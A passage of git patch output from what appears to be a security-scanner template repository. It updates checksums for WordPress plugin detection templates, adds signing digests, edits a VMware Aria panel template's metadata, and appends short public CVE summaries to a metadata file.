http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:2defafc7780d5c49f4a4087b398683d089afa316 -http/technologies/wordpress/plugins/pixelyoursite.yaml:9bf4653e8ad2328e06a52b06d657aa476a836bf6 -http/technologies/wordpress/plugins/polylang.yaml:80299b7d35766c5347b8f3104e31e22017153583 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:004a5e0e461e2389e4e14e7a5b912b0c0c621a1b +http/technologies/wordpress/plugins/pixelyoursite.yaml:676f16236f3566755b83156cd6abf1c6dccac608 +http/technologies/wordpress/plugins/polylang.yaml:425eb6e1654d9e781cf308fba501c41a926e2bd3 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:0952d95b85b2b86b1f0095874c302f1ab40278a4 -http/technologies/wordpress/plugins/post-smtp.yaml:18d0e8ef642f4559a4a3559258efe64018ec0df3 -http/technologies/wordpress/plugins/post-types-order.yaml:abf38c948ca2dcb4ec450aa46f2db3e7332a1f85 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:f0d12c123128f569c51ed9bccead0ea003992e78 -http/technologies/wordpress/plugins/pretty-link.yaml:88f3e3c43054847d01358d17d35e16dc2686fdcd -http/technologies/wordpress/plugins/really-simple-captcha.yaml:b210628c4b20e18db78347c5ebf233fa279e60bc -http/technologies/wordpress/plugins/really-simple-ssl.yaml:b60ad287fbe763406b2b61525263081242f85f81 -http/technologies/wordpress/plugins/redirection.yaml:013f5f7ca0fd01c5f36c98378907b5284067f6a8 -http/technologies/wordpress/plugins/redux-framework.yaml:c7572b39fa614bc703a446796ebd044912192209 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:759b37d71b94d92d636940dd86126a2b4341ce90 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:549acb0626ddb28607642ac4c4bfb61dc9eda4ed -http/technologies/wordpress/plugins/safe-svg.yaml:baf7f5e83eeaff3b4ca1feb8ef55d923ead57127 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:79fa672c789d501892c31f58c2e3f073d41f5050 -http/technologies/wordpress/plugins/sg-cachepress.yaml:638b9e8122a898968cbfef24df77e3810fe764c4 -http/technologies/wordpress/plugins/sg-security.yaml:19b0c71f5a02929c116be46625f523a3fa3b71c4 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:9188fe74eb338241cb90ba30f414cfaf2b3b2dc7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:b9a16bd9d4f0262130aeb738c91af10f1d40a8aa -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:92519db70c17f733ea9e02ac7aa4b7f74538dd4a -http/technologies/wordpress/plugins/simple-history.yaml:d73aff0d67e4c2dd97c4c4cf42ab009ef15a720d +http/technologies/wordpress/plugins/popup-maker.yaml:ca13c9db85486210d62e6be8b225077bb127c2ad +http/technologies/wordpress/plugins/post-smtp.yaml:10bfb0f2f5bdf3d9fe808839d5401caa44c6e759 +http/technologies/wordpress/plugins/post-types-order.yaml:6b0ffd9abd8204c5ba9efb201525ed22ed4e42f9 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:e58a6005b7afa410193394f329dcb490898f160a +http/technologies/wordpress/plugins/pretty-link.yaml:759bbe695c54ef9c9892888b0acf652a6e23c395 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:be410dd27d4fb7192a3db28e08f6bea582aca158 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8812902897c99760c1ab7ac00bc5624212159e23 +http/technologies/wordpress/plugins/redirection.yaml:2af48fdb7aff667aa4a63cb46f5abd1fe0e08e75 +http/technologies/wordpress/plugins/redux-framework.yaml:9c498507f94157b2fa2cd32e4ae3fa2e6e573b64 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:cae2ee3c2b204c855590d8a051c421cd65c102a0 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:3d3369b47f562b67520802cfa080db4646073292 +http/technologies/wordpress/plugins/safe-svg.yaml:5128757a7d175c03867114cf3d7fa1fa54242b83 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:00bdea82355f90ea0d4237b3f88d58fefc21fcc8 +http/technologies/wordpress/plugins/sg-cachepress.yaml:4ff93573ea2e25e5d4f7550c397aa81f79908070 +http/technologies/wordpress/plugins/sg-security.yaml:a5195b8c2bd318cf957feefad1a75f79633d3579 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:8905329951fb3d611dd3faa964c72649d6a5f7e4 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:ee1d252cccc20ba7b716e958a22782cd4f8d31b2 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:0c189bf523575dd6c6db3a770968fb13af247bd7 +http/technologies/wordpress/plugins/simple-history.yaml:61e1beea473d98dbdc9e0f40ac564ae9c98fc043 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:a1af74ca935a813c95af294e9d9c198af4c6c1b8 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:5e4708ae59a145199e84d25009c8b27812033f60 -http/technologies/wordpress/plugins/smart-slider-3.yaml:92430c9f748db84b62d334486260de56ba624f9d -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:b95b64cf8d7d33f8177ad09b5dff26737c60fe81 +http/technologies/wordpress/plugins/siteguard.yaml:61b724210b392636bd4041ff8f0f0bfcaa4c4cb2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:136daa813f9e73ba5a5a57d7a949c477f80d0cb5 +http/technologies/wordpress/plugins/smart-slider-3.yaml:539ae11c7dae47afe524a9fbe56ae9db378cab8b +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:14ab628e8f702cd7c1367f14a09341fe64103080 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:816b5be0d4ec5a73fbd71eb5b8e137f84a5051a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:35f1ccf84036b6ecbebeb2d3197fc211aaa686c2 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:8cfb7ceadecbead330fe50ac4a9b8dd46df352ff -http/technologies/wordpress/plugins/svg-support.yaml:560f9caad5bdb1f49a8fbdd3774ede98090663f9 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:3fd042102a10583754916c91dbfe6e698268a714 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:4f26ba20cab4fe083d8eea2eeb46417a0e7732b0 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:191198d25425778d14b05764ed7bbef90b9b445b +http/technologies/wordpress/plugins/svg-support.yaml:26cf7f4573e8ba2457f39080370bd9b40ad918f1 http/technologies/wordpress/plugins/table-of-contents-plus.yaml:142cf7dc3d34ed35422ad91447b3f1f986d965b6 -http/technologies/wordpress/plugins/tablepress.yaml:a6662bee3adab3e003dffbe1c909f8a6639af955 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:0c364424ac98380f6edffe3c6fa822b0233ca4c0 -http/technologies/wordpress/plugins/templately.yaml:4042964fb19a358f4d2976f5d3bcd31380ced493 -http/technologies/wordpress/plugins/the-events-calendar.yaml:14026602f701683730ac9d0e7d4897396c6b64a4 +http/technologies/wordpress/plugins/tablepress.yaml:f8df0f026bb8f673623444b335e7e2003b32ccca +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:d60b7235b04f934cdc313e4d3ecf27fa7abf256f +http/technologies/wordpress/plugins/templately.yaml:8c637458e79f951e71fff59191c00379b3c7a2da +http/technologies/wordpress/plugins/the-events-calendar.yaml:154bd36f7353358e92ffa2e0844d0a32500e89c0 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9ff4edda1f0c2643d312e079156b20bc2b7744a4 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:121ce0e2c88459a5fee86019abb184718d346215 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:fa24482bbf629135457c5564bbbb5cb18273fe17 -http/technologies/wordpress/plugins/under-construction-page.yaml:bc63efd26fe6d1edf184451ea56ac63061597120 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:b4e38fda13a743f392740e8d71a4c1e868f29166 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:32c60ebfb622e02bd6bbd5a22f54c693808baee2 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:de0d056ff24a38b3802c52cfd0cc1cf3ed16c874 +http/technologies/wordpress/plugins/under-construction-page.yaml:8fdc2b4c7b20ee534beef7874d99237c97adf46d http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:36c8f82d7d707dc0fe71b0d43d0ec4e8459db93b +http/technologies/wordpress/plugins/updraftplus.yaml:5435f7bf7cf4d0b67ec0e3981d64d2a4e7707b0b http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:38475ba95383e6ee2cfb7f7afc5c6af72560b80f +http/technologies/wordpress/plugins/user-role-editor.yaml:cc7c274cc084f221fd4130ba3db895b473b0c53d http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:0893f4f7c1bed39112296e2bceb9fcf76cec1f75 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:f7c78e393479a698b5b2c520efaee1c6e6f7165a -http/technologies/wordpress/plugins/webp-express.yaml:b278095a4ca9d6fe02d3c6d26a64312cdea4dec2 +http/technologies/wordpress/plugins/w3-total-cache.yaml:9bcced3a0da8ff0608b8b46bbf726c10346b7af1 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:32846e808bcbbaf3ef0cb8ed8ea5fadd6a8b695d +http/technologies/wordpress/plugins/webp-express.yaml:5055c9af095501ffffdad32d8a440156ba282b62 http/technologies/wordpress/plugins/widget-importer-exporter.yaml:6704a9b4d0dcda2afcbac6ec83aab1e38ff1f0dc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:85def64ec645473abec579706519a0a3cd047131 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:e3209c6dae662d96b2ca44e2d758215b2b95127b +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:043eac3c028644c548b653f26eafaa492cb8609e +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:9c746c9131f4c6a347813095db5370189ef2ae28 http/technologies/wordpress/plugins/woo-inpost.yaml:ccc431985c9227d06dce6cd78efea4b46ddf791c -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:69fe8b5888b82a5d229a335a63eccbc276ea1419 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:af25e63f5f7455d8533d6670210db9457b2d2c70 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d0da61ccd7f8da206e1aac519f6cd962d060d689 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:994865a29ba76e25e720e891f55ca25fbe6951a9 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:804b72ae3d63f10b5f4451c38b986d07b925b01b -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:ea32c7a761a415e6caab01a2573d6a1dd2a527bb -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:833b4694f1c509671e9c5cc895cf6bcdd9b6fdb6 -http/technologies/wordpress/plugins/woocommerce-services.yaml:121dffb5cfa7176be800b9b0b40f0f74dcd67e98 -http/technologies/wordpress/plugins/woocommerce.yaml:62d52e774719f405a8f66607a73bae2d5b425d30 -http/technologies/wordpress/plugins/wordfence.yaml:c61b752ba31290877bd454908a9dc2df279e4d74 -http/technologies/wordpress/plugins/wordpress-importer.yaml:12b1a4df82573f8d08da550afada3de3d799bcea -http/technologies/wordpress/plugins/wordpress-seo.yaml:29215ee7f581f853172b7bd024d8fa29de2734bb +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:0beafe3702576541aab8cd6efd4e6f9c9dc91dc5 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:a97a4f4408388fe8a2a67f69ca6df97850101c68 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:d259387ab1e735e3501ec80ad01cfe4e8625feec +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:024946648373e657e791d5d3213c2f851a8f89fe +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:ec22e881d0f0880f2d90844cf5969941152d212b +http/technologies/wordpress/plugins/woocommerce-services.yaml:5256dc71f995b6c616b7c027bee83531648c583b +http/technologies/wordpress/plugins/woocommerce.yaml:7eb5bdee8315c4047349d27b8d157b3cf17a26b2 +http/technologies/wordpress/plugins/wordfence.yaml:ff5b6fc64c14bf6ec51d249d40139cc4bfadfb94 +http/technologies/wordpress/plugins/wordpress-importer.yaml:1bbf50d1a8f3b3ec192572bd74a0d8ef48be5525 +http/technologies/wordpress/plugins/wordpress-seo.yaml:8bfd8fc7eac17d02bc77e87ff86dd23aab595537 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:3a52748a5a5d6a1e9ef998c57e829ed786b3c9b1 -http/technologies/wordpress/plugins/wp-crontrol.yaml:80a4d7e45222ec5563a84b32bc2e7e2f596b51b6 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:209582da9da80f74135f8ad6d4214a0dfa691536 -http/technologies/wordpress/plugins/wp-file-manager.yaml:9fd6d0e88442b8d5e53747b54a8929512089b319 -http/technologies/wordpress/plugins/wp-google-maps.yaml:8a0c827d7e50762d8a2d0037d20c1e8fb0a5eabc -http/technologies/wordpress/plugins/wp-mail-logging.yaml:61ee6fc5c7da88caba77b3da4acc4ba1493fe80b -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:60ce5676e3a16ae7dc9a297af7fa77fc68785b3e -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:9e05a8af56e1e345f96570dfab2ec1c7a78d8365 +http/technologies/wordpress/plugins/worker.yaml:49084a407d7ac416bedbc5940d670fd21935c127 +http/technologies/wordpress/plugins/wp-crontrol.yaml:beb27da60da805df72ceb038550fbc27c6a6e93f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:c5e7c6bd06c61ebd19ac358568782b76c4f80b2d +http/technologies/wordpress/plugins/wp-file-manager.yaml:d5092532cbe7c481f45af27049f903908e9e1950 +http/technologies/wordpress/plugins/wp-google-maps.yaml:954fbfec27814950e2f8555e3090c654a49ff6d0 +http/technologies/wordpress/plugins/wp-mail-logging.yaml:3a15ab7d9a4870e64ea18adbf83393b861a88244 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:788e237f95659ff38a423afc3037b399038716d7 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:f53d7254512a271d0a645c13f7540eba4b2a9d74 http/technologies/wordpress/plugins/wp-migrate-db.yaml:e4d387e29ada0961b3320d2b69e8773746ca268a -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:f4c7cdc232e5a6e1cddb08fd959762452c5aacdc -http/technologies/wordpress/plugins/wp-optimize.yaml:6c9d7ce1565bc3a7c71b7dd3be7873360afe5ed2 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:72d78879144cd0740134a518d577b0caf61d9325 -http/technologies/wordpress/plugins/wp-reset.yaml:a86656c246bc5ca29419162196f39c5d59d61243 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:f04c7ef0ff6ec109ae7920d8edd6388c4811a2c8 -http/technologies/wordpress/plugins/wp-rollback.yaml:718fba0447a33037f1dce0b3525ad8619d904656 -http/technologies/wordpress/plugins/wp-seopress.yaml:58ac22b7cd81f701b9dba004dc598a651a2ec191 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:30c552edc46e20dd4ad0cf0c8d27fef8bd9df39f -http/technologies/wordpress/plugins/wp-smushit.yaml:bc0d9f69e0b97f3ca812400d10edeaac34dac1fe -http/technologies/wordpress/plugins/wp-statistics.yaml:83994a9fe8adea557519f44d916fdbf100f39b70 -http/technologies/wordpress/plugins/wp-super-cache.yaml:4c63fdbe29f235b5f4b0cf18400b2868c3de98f6 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:18b339035c87c87820bda0dc4ccf17b8d7dad887 +http/technologies/wordpress/plugins/wp-optimize.yaml:4b197891fe142ab45d30199db393616fa6f0a6a9 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:5d0fbc2be59b40619decac83eac5ea2bf7a74da1 +http/technologies/wordpress/plugins/wp-reset.yaml:685d26e180755b3bf58d179e82420e4ec0e6785f +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:bf2020a5f3806f30cfdb70539cfe48bfb9ee5c37 +http/technologies/wordpress/plugins/wp-rollback.yaml:58e4df8827bef6b7946da1c5492423f71af4d5cb +http/technologies/wordpress/plugins/wp-seopress.yaml:d9d312486e9ade2bd52a608f1717a106a32c69f3 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a766acfe0b60e794600e8fc579d6d40645cc4bd7 +http/technologies/wordpress/plugins/wp-smushit.yaml:eec54e553221daa930e009ccbac581183f643409 +http/technologies/wordpress/plugins/wp-statistics.yaml:a70a7d5e42f9489b2c28e1f3fc9141432a015ec2 +http/technologies/wordpress/plugins/wp-super-cache.yaml:2cd2fbb2eb374a5d6b7e7bed32c2559fcc1aa97c http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:530450e7cd8214091c9f2d81cd5b7bc09a10148b -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:3778a95bad9b9410fc508fa0b77933f8a155bbed -http/technologies/wordpress/plugins/wpforms-lite.yaml:1f891311ee12fd618fabf2587f37a1fbe908852b -http/technologies/wordpress/plugins/wps-hide-login.yaml:07cfd760ea6f6d4b021a68422c44ddbaf16fb83f -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:eda484a978a322bcbd71dff686d2318bf51f0e11 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9dc236b58592595d94170dbb6003255a9396468c +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:06e4940cdfad32431120c82ed81e8eb6b4e70738 +http/technologies/wordpress/plugins/wpforms-lite.yaml:52846c4594e35751632ab2333e8e43c9c3bf9cf0 +http/technologies/wordpress/plugins/wps-hide-login.yaml:f06929bd96c5d55e73151bd97773061e8de9058c +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:6be01ef81843ddbe3db7798cd28b01d2daf1b98a http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:d1d11801a94d23ab2fbeb2b22081cbb45db17abf +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:92a10839ee67e167753fd28582499d504dd6709b http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cf9a544627bf169a3572f810cd893cecdfdaec2d http/technologies/wordpress-detect.yaml:743b35c9139a66a10e24776aabe59d58f5e4f63c http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -9227,7 +9228,7 @@ javascript/cves/2024/CVE-2024-47176.yaml:e42105b056536c9f39f5896585164b97d79413f javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad javascript/default-logins/redis-default-logins.yaml:94bc6aea27f0f07f41834001f2efd51758a8ac2b -javascript/default-logins/ssh-default-logins.yaml:2b9aeadfb99b58a2935dfd62ef7c113d5e6322cc +javascript/default-logins/ssh-default-logins.yaml:b4d9fcc9671233055fc523ce08aa4d2831fe6aee javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:22422a4d4104d0af98420fb8b2207b8eab8a8ab9 javascript/detection/samba-detect.yaml:58ae5e9f3fa51624995c4060fccc13dfde9cbe59 @@ -9462,7 +9463,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2b41f5832663c6016a1e150bc7a88c3b24980dc5 +templates-checksum.txt:03f5529c08ae1c2bae4304e6c0838b8d8a216f42 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b2f9658bfb008071f71184f464b00084b584552b Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 15 Oct 2024 07:35:08 +0000 Subject: [PATCH 087/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/cves/2024/CVE-2024-39713.yaml | 2 ++ http/exposed-panels/txadmin-panel.yaml | 3 +-- http/technologies/mirth-connect-detect.yaml | 5 ++--- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-39713.yaml b/http/cves/2024/CVE-2024-39713.yaml index 9da04420df..b8bf734578 100644 --- a/http/cves/2024/CVE-2024-39713.yaml +++ b/http/cves/2024/CVE-2024-39713.yaml @@ -58,3 +58,5 @@ http: part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" + +# digest: 4b0a00483046022100d4963be63f618917743d9135979d4e5cbc0616a4a625d65c65196409b30c779c022100e52e873c1b6c9ef9f95b74dd18262abbaace038bd6efcc0748d6907b6f6ae91e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/txadmin-panel.yaml b/http/exposed-panels/txadmin-panel.yaml index 28920e9bc0..caf97ab809 100644 --- a/http/exposed-panels/txadmin-panel.yaml +++ b/http/exposed-panels/txadmin-panel.yaml @@ -23,5 +23,4 @@ http: - 'contains_any(body, "txAdmin Login", "txAdmin Logo")' - 'status_code == 200' condition: and - -# digest: 4b0a00483046022100a89e63f01439862278df2449a7397ceb19286d0b56f6351c1a4d80b93e330962022100e74023bb2ad3d47258f7a6471a2359150970301c643c2f3c400ce2e08dad7e13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1e5817a43f9426c2dc2e0449b561158fb47d32bb1af34cbe1aa2d7568e58e80022100ab6e7f2d7c284cadddd9dc88640cc64757bcebd2568ae27f8fcbe447c1153667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/mirth-connect-detect.yaml b/http/technologies/mirth-connect-detect.yaml index aa6121f944..0eb00dd8f0 100644 --- a/http/technologies/mirth-connect-detect.yaml +++ b/http/technologies/mirth-connect-detect.yaml @@ -27,6 +27,5 @@ http: - type: status status: - - 200 - -# digest: 4b0a004830460221009db8883fb67824a1e00773576aebe46af6c8818b422c71cadcfe56bb4e98d41c0221008fbc6f0002cf712c7cc3c688196ba3aab07e193689e18773a03c2940fceddafc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - 200 +# digest: 4a0a0047304502210099e94c111d678426d1d40e357d0601cfea0fbf2644565fa3cec4966f8e801da502201f3d50e3f4dc9676facf80d667af438be9ce3143a60aadf13a97f0c4f4d515b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5ee822b9af3fd7599af8678fdd3761d6dd0da243 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Oct 2024 11:38:25 +0400 Subject: [PATCH 088/218] Update vmware-aria-panel.yaml --- http/exposed-panels/vmware-aria-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/vmware-aria-panel.yaml b/http/exposed-panels/vmware-aria-panel.yaml index 1a5821da11..5acbbbc116 100644 --- a/http/exposed-panels/vmware-aria-panel.yaml +++ b/http/exposed-panels/vmware-aria-panel.yaml @@ -1,16 +1,16 @@ id: vmware-aria-panel info: - name: VMware Aria Operations Login - Panel + name: VMware Aria Operations Login - Detect author: rxerium severity: info description: | - Detects VMware Aria Operations Panel was discovered + Detects VMware Aria Operations Panel. metadata: verified: true max-request: 1 shodan-query: title:"VMware Aria Operations" - tags: panel,aria,login + tags: panel,aria,login,detect http: - method: GET From be01261bb30fe6f46dde8cf392d9a526377d69f0 Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 15 Oct 2024 07:39:23 +0000 Subject: [PATCH 089/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 58832b3379..242a029944 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,6 @@ http/cves/2024/CVE-2024-39713.yaml +http/cves/2024/CVE-2024-5910.yaml +http/exposed-panels/paloalto-expedition-panel.yaml http/exposed-panels/traccar-panel.yaml http/exposed-panels/txadmin-panel.yaml http/technologies/mirth-connect-detect.yaml From 3b2f249889a057fea63cabce40037397f321aee7 Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 15 Oct 2024 07:39:24 +0000 Subject: [PATCH 090/218] =?UTF-8?q?chore:=20generate=20CVEs=20metadata=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves.json | 3 +++ cves.json-checksum.txt | 2 +- 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index e9da684fea..fa27ab3acb 100644 --- a/cves.json +++ b/cves.json @@ -2573,6 +2573,7 @@ {"ID":"CVE-2024-38856","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"critical","Description":"Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-38856.yaml"} {"ID":"CVE-2024-3922","Info":{"Name":"Dokan Pro \u003c= 3.10.3 - SQL Injection","Severity":"critical","Description":"The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3922.yaml"} {"ID":"CVE-2024-39250","Info":{"Name":"EfroTech Timetrax v8.3 - Sql Injection","Severity":"high","Description":"EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-39250.yaml"} +{"ID":"CVE-2024-39713","Info":{"Name":"Rocket.Chat - Server-Side Request Forgery (SSRF)","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-39713.yaml"} {"ID":"CVE-2024-39903","Info":{"Name":"Solara \u003c1.35.1 - Local File Inclusion","Severity":"high","Description":"A Local File Inclusion (LFI) vulnerability was identified in widgetti/solara, in version \u003c1.35.1, which was fixed in version 1.35.1. This vulnerability arises from the application's failure to properly validate URI fragments for directory traversal sequences such as '../' when serving static files. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-39903.yaml"} {"ID":"CVE-2024-39907","Info":{"Name":"1Panel SQL Injection - Authenticated","Severity":"critical","Description":"1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-39907.yaml"} {"ID":"CVE-2024-39914","Info":{"Name":"FOG Project \u003c 1.5.10.34 - Remote Command 